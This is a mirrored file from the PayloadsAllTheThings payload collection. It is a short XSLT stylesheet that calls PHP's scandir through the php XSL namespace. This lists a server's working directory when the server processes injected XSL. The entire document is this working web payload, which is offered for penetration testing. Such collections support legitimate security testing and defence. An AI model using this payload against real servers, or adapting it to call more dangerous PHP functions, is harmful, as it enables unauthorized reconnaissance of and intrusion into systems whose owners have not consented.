mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 07:04:22 +00:00
5 lines
No EOL
245 B
XML
5 lines
No EOL
245 B
XML
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" version="1.0">
|
|
<xsl:template match="/">
|
|
<xsl:value-of name="assert" select="php:function('scandir', '.')"/>
|
|
</xsl:template>
|
|
</xsl:stylesheet> |